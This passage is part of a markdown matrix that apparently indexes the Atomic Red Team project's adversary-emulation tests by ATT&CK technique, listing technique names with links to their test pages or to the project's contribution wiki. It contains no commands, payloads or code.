| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Native API](../../T1106/T1106.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Active Setup](../../T1547.014/T1547.014.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Information Discovery](../../T1082/T1082.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hide Artifacts](../../T1564/T1564.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Query Registry](../../T1012/T1012.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Encrypted Channel](../../T1573/T1573.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Process Injection](../../T1055/T1055.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
